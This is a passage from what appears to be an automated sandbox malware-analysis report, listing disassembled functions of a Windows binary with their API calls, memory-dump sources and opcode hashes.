                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                          • String ID:
                                                                                          • API String ID: 513048808-0
                                                                                          • Opcode ID: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                                                                          • Instruction ID: 17298b8667e8164354487566bbfae7d0d2ff77266ff71ca776e76e79c8056672
                                                                                          • Opcode Fuzzy Hash: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                                                                          • Instruction Fuzzy Hash: 01216232D0E783A7E7905B64A588238AAA0FF4A765F144235E95ED27E1CF7CE448A700
                                                                                          Function 00007FF6A0E83578 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E83584
                                                                                          • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E8359C
                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835C3
                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835D9
                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835ED
                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E83602
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                          • String ID:
                                                                                          • API String ID: 513048808-0
                                                                                          • Opcode ID: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                                          • Instruction ID: 9360532829a1180bc1ba1bfd298e21d861a24efe4ffdd5f5c546e1659e996bc3
                                                                                          • Opcode Fuzzy Hash: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                                          • Instruction Fuzzy Hash: 7F118231A0AA83B6EA508B74A544078AAA0FF4A776F155334EA2F837D0DF3CD449B700
                                                                                          Function 00007FF6A0E89584 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                          • String ID:
                                                                                          • API String ID: 4104442557-0
                                                                                          • Opcode ID: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                                          • Instruction ID: da337f146694d40f7d7b5ee8f168c45d44a5ef4284a76db0b27135cd516d3f6c
                                                                                          • Opcode Fuzzy Hash: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                                          • Instruction Fuzzy Hash: F1115132A06B429BEB00DF70E8441A933B4FB5D759F500A30EA6D87B54EF7CD5A49340
                                                                                          Function 00007FF6A0E71DC0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 139COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcschr$Heapiswspacememset$AllocProcess
                                                                                          • String ID: %s
                                                                                          • API String ID: 2401724867-3043279178
                                                                                          • Opcode ID: 740c75b15b64cf7ac9eb9688b57878eb6de44e609a22920e9cf606d70b52c251
                                                                                          • Instruction ID: aa66959b98c0e2ab925dcff1ec252c9b985aa4f6ee021086a056ce9cad47ed80
                                                                                          • Opcode Fuzzy Hash: 740c75b15b64cf7ac9eb9688b57878eb6de44e609a22920e9cf606d70b52c251
                                                                                          • Instruction Fuzzy Hash: 9151BB72B0A683AAEB208F25D8402B977A0FF49B94F444035DE5D87795EF3CE545E700
                                                                                          Function 00007FF6A0E8417C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentDirectorytowupper
                                                                                          • String ID: :$:
                                                                                          • API String ID: 238703822-3780739392
                                                                                          • Opcode ID: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                          • Instruction ID: 9d9a1b67c2931cd473b2193f9dffb7614a01e9b4999d71b81f983902e503c8a5
                                                                                          • Opcode Fuzzy Hash: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                          • Instruction Fuzzy Hash: 0C11277260A742A5EB258B71E805279F6E0FF4D79AF458132EE0D87790DF3CD145A704
                                                                                          Function 00007FF6A0E791C0 Relevance: 7.6, APIs: 5, Instructions: 138COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 00007FF6A0E7921C
                                                                                          • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6A0E793AA
                                                                                            • Part of subcall function 00007FF6A0E78B20: wcsrchr.MSVCRT ref: 00007FF6A0E78BAB
                                                                                            • Part of subcall function 00007FF6A0E78B20: _wcsicmp.MSVCRT ref: 00007FF6A0E78BD4
                                                                                            • Part of subcall function 00007FF6A0E78B20: _wcsicmp.MSVCRT ref: 00007FF6A0E78BF2
                                                                                            • Part of subcall function 00007FF6A0E78B20: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E78C16
                                                                                            • Part of subcall function 00007FF6A0E78B20: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6A0E78C2F
                                                                                            • Part of subcall function 00007FF6A0E78B20: wcschr.MSVCRT ref: 00007FF6A0E78CB3
                                                                                            • Part of subcall function 00007FF6A0E8417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6A0E841AD
                                                                                            • Part of subcall function 00007FF6A0E83060: SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF6A0E792AC), ref: 00007FF6A0E830CA
                                                                                            • Part of subcall function 00007FF6A0E83060: SetErrorMode.KERNELBASE ref: 00007FF6A0E830DD
                                                                                            • Part of subcall function 00007FF6A0E83060: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E830F6
                                                                                            • Part of subcall function 00007FF6A0E83060: SetErrorMode.KERNELBASE ref: 00007FF6A0E83106
                                                                                          • wcsrchr.MSVCRT ref: 00007FF6A0E792D8
                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E79362
                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6A0E79373
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Error$Mode$AttributesFileLast_wcsicmpmemsetwcsrchr$CurrentDirectoryFullNamePathwcschr
                                                                                          • String ID:
                                                                                          • API String ID: 3966000956-0
                                                                                          • Opcode ID: 183dd49cd64c4b512f254b2111cbb7598a172917c7dc1c37f5ad0fa1295e0e26
                                                                                          • Instruction ID: ccd7cafef9c02098fd72ad3f03de88393f2d586589c48a52a10c5fc60daa8822
                                                                                          • Opcode Fuzzy Hash: 183dd49cd64c4b512f254b2111cbb7598a172917c7dc1c37f5ad0fa1295e0e26
                                                                                          • Instruction Fuzzy Hash: 7151A132A0B783AAEB619F21D8502B973A4FF49B94F144035DA4D87B96DF3CE555E300
                                                                                          Function 00007FF6A0E72A30 Relevance: 7.6, APIs: 5, Instructions: 119COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$_setjmp
                                                                                          • String ID:
                                                                                          • API String ID: 3883041866-0
                                                                                          • Opcode ID: ecc4c4b8fdff3fe7128d071ff51470f6781c2868d41e5204ec9995c2413b862b
                                                                                          • Instruction ID: 0d8a7926be7279bdd5d7f1818692bd8a66d0eab3a288a87ff977f10a7a513f45
                                                                                          • Opcode Fuzzy Hash: ecc4c4b8fdff3fe7128d071ff51470f6781c2868d41e5204ec9995c2413b862b
                                                                                          • Instruction Fuzzy Hash: 04516D32A0AB869AEB61CF21D8403E977A4FB49748F444139EA4D8BB49DF3CD645DB00
                                                                                          Function 00007FF6A0E9E558 Relevance: 7.6, APIs: 5, Instructions: 100COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorModememset$FullNamePath_wcsicmp
                                                                                          • String ID:
                                                                                          • API String ID: 2123716050-0
                                                                                          • Opcode ID: bbaf5dedd0cbdd4485c46577773df657aecb1a5bcd9d4c4f0a46f38ce4e38573
                                                                                          • Instruction ID: 3b92ce1e7ea0f2dc4bc367535446947fa65de45b2aeed9ec81226022f30a6b59
                                                                                          • Opcode Fuzzy Hash: bbaf5dedd0cbdd4485c46577773df657aecb1a5bcd9d4c4f0a46f38ce4e38573
                                                                                          • Instruction Fuzzy Hash: 7B41903270ABC29AEB718F25D8503E967A4FB49B8DF044134DB4D8AB99DF3CD2499700
                                                                                          Function 00007FF6A0E765F8 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Console$Window_get_osfhandle$InitializeModeUninitializememset
                                                                                          • String ID:
                                                                                          • API String ID: 3114114779-0
                                                                                          • Opcode ID: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                                                          • Instruction ID: 4863d05a9c0cb4b22135a9edc6520b25f37b698ba00d273919510669793c5822
                                                                                          • Opcode Fuzzy Hash: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                                                          • Instruction Fuzzy Hash: C4411632A0AB42AAE7008F65E8802AD77A5FB88748F554136EA0D93B55DF38E416D740
                                                                                          Function 00007FF6A0E99308 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                          • String ID: %s=%s$DPATH$PATH
                                                                                          • API String ID: 3731854180-3148396303
                                                                                          • Opcode ID: ed2b41c8f7c1b35c8c8099a63381124b221818ea20370dab215de2e112638c1b
                                                                                          • Instruction ID: b4100da367efd42e06ae6e9ca4db64a264bb8194cd8f2287079e6eeec79ab058
                                                                                          • Opcode Fuzzy Hash: ed2b41c8f7c1b35c8c8099a63381124b221818ea20370dab215de2e112638c1b
                                                                                          • Instruction Fuzzy Hash: 61218B72B0B643A2EA54DF5AE4402B9A7B0BF88BC0F984135DD0EC7795DF2CE844A350
                                                                                          Function 00007FF6A0E88198 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcscmp
                                                                                          • String ID: *.*$????????.???
                                                                                          • API String ID: 3392835482-3870530610
                                                                                          • Opcode ID: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                                          • Instruction ID: 0b7f62fc094bc8f30599c39fc0166625dd04408525ce4c0cc3b621069cf24260
                                                                                          • Opcode Fuzzy Hash: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                                          • Instruction Fuzzy Hash: 5611A135B25AA391E7688F26B54053973A1FB88B80F1D5031DE8D97B99DF3DE481A700
                                                                                          Function 00007FF6A0E809F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: iswspacewcschr
                                                                                          • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$=,;
                                                                                          • API String ID: 287713880-1183017076
                                                                                          • Opcode ID: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                                                          • Instruction ID: 2696317d1d78fe5c4ff2287c67e83b8cc7db43652a81909c36ae0990c28fce1e
                                                                                          • Opcode Fuzzy Hash: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                                                          • Instruction Fuzzy Hash: F0F06231A1E753E5FAA88B51F44017A66A0FF49F41F5A9171E95E83354EF3CE448E700
                                                                                          Function 00007FF6A0E759E4 Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E81EA0: wcschr.MSVCRT(?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF6A0EA0D54), ref: 00007FF6A0E81EB3
                                                                                          • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E75A2E
                                                                                          • _open_osfhandle.MSVCRT ref: 00007FF6A0E75A4F
                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00008000,?,00000001,00007FF6A0E7260D), ref: 00007FF6A0E937AA
                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF6A0E937D2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                                                                          • String ID:
                                                                                          • API String ID: 22757656-0
                                                                                          • Opcode ID: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                                          • Instruction ID: e84dd46319411e3f8c536e4a56e9bab855937b585c6485bd26942bce53296f20
                                                                                          • Opcode Fuzzy Hash: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                                          • Instruction Fuzzy Hash: FF119472A1564697E7108B24E44833DBAA0FB89B75F644734E62E873D5CF3CD4499B00
                                                                                          Function 00007FF6A0E89158 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
